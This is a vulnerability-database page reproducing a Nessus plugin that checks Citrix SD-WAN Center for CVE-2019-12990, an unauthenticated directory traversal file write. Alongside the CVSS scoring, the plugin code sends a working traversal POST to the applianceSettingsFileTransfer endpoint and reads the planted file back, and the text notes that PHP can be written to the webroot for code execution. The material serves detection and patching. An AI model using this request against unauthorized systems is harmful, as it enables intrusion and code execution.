Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
nessusThis script is Copyright (C) 2019 and is owned by Tenable, Inc. or an Affiliate thereof.CITRIX_SDWAN_CENTER_UNAUTH_DIR_TRAVERSAL_WRITE.NASL
HistoryDec 18, 2019 - 12:00 a.m.

Citrix and NetScaler SD-WAN Center Unauthenticated Directory Traversal File Write

2019-12-1800:00:00
This script is Copyright (C) 2019 and is owned by Tenable, Inc. or an Affiliate thereof.
www.tenable.com
17

10 High

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

COMPLETE

Integrity Impact

COMPLETE

Availability Impact

COMPLETE

AV:N/AC:L/Au:N/C:C/I:C/A:C

9.8 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

0.908 High

EPSS

Percentile

98.8%

JSON

The remote Citrix SD-WAN Center or NetScaler SD-WAN Center is susceptible to directory traversal and file writes in arbitrary locations. This is due to improper sanitization of user-supplied input in the applianceSettingsFileTransfer action of ApplianceSettingsController. An unauthenticated, remote attacker can exploit this by routing traffic through the Collector controller and supplying crafted values for ‘filename’, ‘filedata’, and ‘workspace_id’. This allows writing files to locations writable by the ‘www-data’ user, as well as writing crafted PHP files to /home/talariuser/www/app/webroot/files/ to execute arbitrary PHP code.

#TRUSTED 86e9323ac381ea785484a7e4a258db6477151822752d3ab97277f6fe564b9ccceac5aa290c474d29d5d680c099a03de0cdd462705e656658ce1c6cb1cfb3da4033add572000191c455e53d7f51febddc1bbc9cbb31003ac2252e510acdfe5e7557e15e628cf0470d79cea44c58f968cc001ff1e6c15a5f82234ee1be0b3754151caea8444ba42c3066eff5dcd009889ba20d29c2b5dde5dd77c16317d8c0d38ba6653ee56dc1cc66a5fac12bbda8c66c05a1617d0fcfb594b4df3ce0da7f46381880a52d8f83afb44ef08010c3cc0bcea64a96eb43466e1cebf3571fa66fcc1e5dc1a4acc659082e104df1edcabd47d27ceea84d4056dcc4e2540765d62e744d600a4299372f2636e1a8c62bd54e9e55a4be30cd19a39f07f7ac5adb3886e727fe4ae3bf6f2ea84ea8b1f551055c5d399f544a0e150b59b22e9c516bed13c2e6f0b94bf164e862fe64d6494920e0f6d0027acd3912272c272f8b01eea72c8149df735dc42edbb19b534fe37a934764a9b6c596b777eb078a16ef83cae99b6efe24f14f4c65813829776c092b14f1bfbea8357f26a7ce35baccc45a1a5cb5a6848fb64ddcc51684e3cb49d8e23e3b0967073ed906c641bee61f30704715ea85b2d983e5c791a49582ef6659c89aa48dd2854ab3576477b192f1dcc14341c1571e0e7831c1d00bf6474feb483e170228c7c783e121dd17f616b73254338be68cac
#
# (C) Tenable Network Security, Inc.
#

include("compat.inc");

if (description)
{
  script_id(132102);
  script_version("1.4");
  script_cvs_date("Date: 2019/12/19");

  script_cve_id("CVE-2019-12990");
  script_bugtraq_id(109133);
  script_xref(name:"TRA", value:"TRA-2019-31");

  script_name(english:"Citrix and NetScaler SD-WAN Center Unauthenticated Directory Traversal File Write");
  script_summary(english:"Attempts to upload a file visible on the web root of the remote host.");

  script_set_attribute(attribute:"synopsis", value:
"The remote host is susceptible to directory traversal with write capability by a remote, unauthenticated attacker.");
  script_set_attribute(attribute:"description", value:
"The remote Citrix SD-WAN Center or NetScaler SD-WAN Center is susceptible to directory traversal and file writes in
arbitrary locations. This is due to improper sanitization of user-supplied input in the applianceSettingsFileTransfer
action of ApplianceSettingsController. An unauthenticated, remote attacker can exploit this by routing traffic through
the Collector controller and supplying crafted values for 'filename', 'filedata', and 'workspace_id'. This allows
writing files to locations writable by the 'www-data' user, as well as writing crafted PHP files to
/home/talariuser/www/app/webroot/files/ to execute arbitrary PHP code.");
  script_set_attribute(attribute:"see_also", value:"https://support.citrix.com/article/CTX251987");
  # https://www.tenable.com/blog/multiple-vulnerabilities-found-in-citrix-sd-wan-center-and-sd-wan-appliances
  script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?a1b1f9a7");
  script_set_attribute(attribute:"solution", value:
"Upgrade to Citrix SD-WAN Center version 10.2.3 or later or NetScaler SD-WAN Center version 10.0.8 or later.");
  script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C");
  script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C");
  script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H");
  script_set_cvss3_temporal_vector("CVSS:3.0/E:P/RL:O/RC:C");
  script_set_attribute(attribute:"cvss_score_source", value:"CVE-2019-12990");

  script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
  script_set_attribute(attribute:"exploit_available", value:"true");
  script_set_attribute(attribute:"exploited_by_nessus", value:"true");

  script_set_attribute(attribute:"vuln_publication_date", value:"2019/07/02");
  script_set_attribute(attribute:"patch_publication_date", value:"2019/06/11");
  script_set_attribute(attribute:"plugin_publication_date", value:"2019/12/18");

  script_set_attribute(attribute:"plugin_type", value:"remote");
  script_set_attribute(attribute:"cpe", value:"x-cpe:/a:citrix:sd-wan-center");
  script_end_attributes();

  script_category(ACT_DESTRUCTIVE_ATTACK);
  script_family(english:"CGI abuses");

  script_copyright(english:"This script is Copyright (C) 2019 and is owned by Tenable, Inc. or an Affiliate thereof.");

  script_dependencies("citrix_sdwan_center_detect.nbin");
  script_require_keys("installed_sw/Citrix SD-WAN Center");
  script_require_ports("Services/www", 80, 443);

  exit(0);
}

include('audit.inc');
include('global_settings.inc');
include('install_func.inc');
include('http.inc');
include('spad_log_func.inc');


#
# Main
#

app_name = 'Citrix SD-WAN Center';
# Exit if app is not detected on the target host
get_install_count(app_name:app_name, exit_if_zero:TRUE);
port = get_http_port(default:443);

# Exit if app is not detected on this port
get_single_install(
  app_name : app_name,
  port     : port
);

# Generate a random pattern for the payload to prove the vulnerability
pattern = rand_str(length:8, charset:'0123456789ABCDEF');
spad_log(message:'The pattern for exploit identification is: ' + pattern);
# The parameters for a directory traversal and file upload 
dir_traversal = 'filename=../../../../../../home/talariuser/www/app/webroot/files/nessusdata.txt&filedata=' + pattern;

http_send_recv3(
    method        : 'POST',
    item          : '/Collector/appliancesettings/applianceSettingsFileTransfer',
    port          : port,
    content_type  : 'application/x-www-form-urlencoded',
    data          : dir_traversal
);

upload_request = http_last_sent_request();
spad_log(message:'Attempted to write a file with the following request:\n\n' +
    upload_request);

get_response = http_send_recv3(
    method        : 'GET',
    item          : '/talari/app/files/nessusdata.txt',
    port          : port
);

get_request = http_last_sent_request();

spad_log(message:'Attempted to get the previously written file with the following request:\n\n' +
    get_request);

if (!empty_or_null(get_response[2]))
  spad_log(message:'Received data: ' + get_response[2]);

# If the response is empty or the pattern is not detected, audit as not vulnerable
if (empty_or_null(get_response[2]) || pattern >!< get_response[2])
  audit(AUDIT_LISTEN_NOT_VULN, app_name, port);

# Otherwise, the file upload succeeded so report it as vulnerable
security_report_v4(
  port: port,
  severity: SECURITY_HOLE,
  generic: TRUE,
  request: make_list(upload_request),
  rep_extra: '\nAfter this, Nessus requested and received the uploaded file, nessusdata.txt, using the following request:\n\n' + join(get_request)
);
VendorProductVersionCPE
citrixsd-wan-centerx-cpe:/a:citrix:sd-wan-center

Related

nvd 1
cve 1
cvelist 1
nuclei 1
prion 1
checkpoint_advisories 1
citrix 1
nvd
nvd
CVE-2019-12990
2019-07-16 18:15:13
cve
cve
CVE-2019-12990
2019-07-16 18:15:13
cvelist
cvelist
CVE-2019-12990
2019-07-16 17:29:01
nuclei
nuclei
Citrix SD-WAN Center - Local File Inclusion
2022-07-31 00:16:07
prion
prion
Directory traversal
2019-07-16 18:15:00
checkpoint_advisories
checkpoint_advisories
Citrix SD-WAN Center Multiple Command Injection Vulnerabilities (CVE-2019-12985; CVE-2019-12986; CVE-2019-12987; CVE-2019-12988; CVE-2019-12990; CVE-2019-12992)
2019-07-16 00:00:00
citrix
citrix
Citrix SD-WAN Multiple Security Updates
2020-11-09 09:09:01

10 High

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

COMPLETE

Integrity Impact

COMPLETE

Availability Impact

COMPLETE

AV:N/AC:L/Au:N/C:C/I:C/A:C

9.8 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

0.908 High

EPSS

Percentile

98.8%

JSON
Related for CITRIX_SDWAN_CENTER_UNAUTH_DIR_TRAVERSAL_WRITE.NASL
nvd1cve1cvelist1nuclei1prion1checkpoint_advisories1citrix1